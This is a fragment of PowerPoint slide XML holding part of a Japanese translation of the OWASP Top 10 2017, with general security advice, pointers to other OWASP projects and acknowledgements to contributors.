                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションの全体的なセキュリティに影響を与える可能性のある問題は数多くあります。これらは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションや</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を開発するどんな人にとっても、不可欠な情報です。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>アプリケーションおよび</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>API</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の脆弱性を効果的に見つける方法に関するガイダンスは、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>OWASP Testing Guide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>に記載されています。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>定期的に変更する。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>はこれからも変化し続けます。また、あなたのアプリケーションコードの、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>行も変更していなくても、脆弱になる可能性があります。新しい欠陥が発見され、攻撃方法が洗練されるからです。詳細については、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>の最後に掲載した、開発者、テスター、組織、アプリケーションマネージャのための次のステップの項にあるアドバイスを見直してみてください。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>積極的に思考する。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 脆弱性を追いかけるのをやめ、アプリケーションセキュリティコントロールを強力なものに確立する準備ができたら、以下の文書を参照してください。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>OWASP Proactive Controls</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>プロジェクトは、開発者がセキュリティをアプリケーションに組み込むための出発点を提供します。また、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>は、組織にとって、またアプリケーションレビュワーにとって何を検証したら良いかを示すガイドです。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="900" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>賢くツールを活用する。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>セキュリティ脆弱性は、非常に複雑で深刻なコードに埋もれていることがあります。多くの場合、そのような弱点を発見して排除するための最も費用対効果の高いアプローチは、高度なツールを手元に備えている専門家です。ツールのみに依存することは、セキュリティに関する誤った感覚をもたらしてしまうので、お勧めしません。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>左へ右へ、どこへでも進める。</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> セキュリティをソフトウェア開発の組織全体のカルチャーにかかわる不可欠なものとすることに集中してください。詳しい情報は、 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>にあります。</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1251798371"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="4097906"/>
          <a:ext cx="3429000" cy="5805951"/>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24000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Meiryo" charset="-128"/>
                          <a:ea typeface="Meiryo" charset="-128"/>
                          <a:cs typeface="Meiryo" charset="-128"/>
                        </a:rPr>
                        <a:t>謝辞</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Meiryo" charset="-128"/>
                        <a:ea typeface="Meiryo" charset="-128"/>
                        <a:cs typeface="Meiryo" charset="-128"/>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5468511">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>年版へのアップデートを支援するために、脆弱性データを寄稿した多くの組織に感謝したいと思います。私たちはデータの募集に対して</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>40</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>以上の回答を頂きました。初めて、</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リリースに貢献した全てのデータと寄稿者の全リストを明らかにしました。これは、これまでに公に収集されたものより大規模で多様な脆弱性データのコレクションの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>つであると考えています。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このドキュメントのスペースに記載できる以上のさらに多くの貢献者がおられますので、その貢献に感謝するための</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>専用ページ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>を作成しました。これらの組織の皆さんが、ご自身たちの努力の結晶である脆弱性データを公に共有することで、喜んで最前線に立ってくれたことに感謝したいと思います。このような活動が成長し続けてより多くの組織において同様の協力が奨励されること、ひいては、これが証拠に基づくセキュリティの重要なマイルストーンの</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>つとみなされることを願っています。これらのすばらしい貢献がなければ、</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を作ることはできないからです。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業界ランキングの調査を仕上げるために時間を費やしてくれた</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>500</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>人以上の個人に本当に感謝します。皆さんの声は、</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に</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>つの新しい追加を決定する助けになりました。コメント、励まし、批判もすべて感謝しています。 貴重なお時間をいただき、感謝したいと思います。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非常に建設的なコメントを寄せて頂き、</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にこのアップデートを見直す時間をいただいた人たちに感謝します。皆さんのことは、可能な限り</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>「謝辞」</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>のページに記載しています。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そして最後に、世界中で</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をもっと手に取りやすくするため、</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のこのリリースを多数の言語に翻訳なさる翻訳者の皆さんに前もって感謝したいと思います。</a:t>
                      </a:r>
                      <a:endPar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ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>導入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>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549569009"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6858000" cy="8990695"/>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6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1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2013</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>年版から</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1800" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>年版への変更点</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775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>前のバージョンから</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
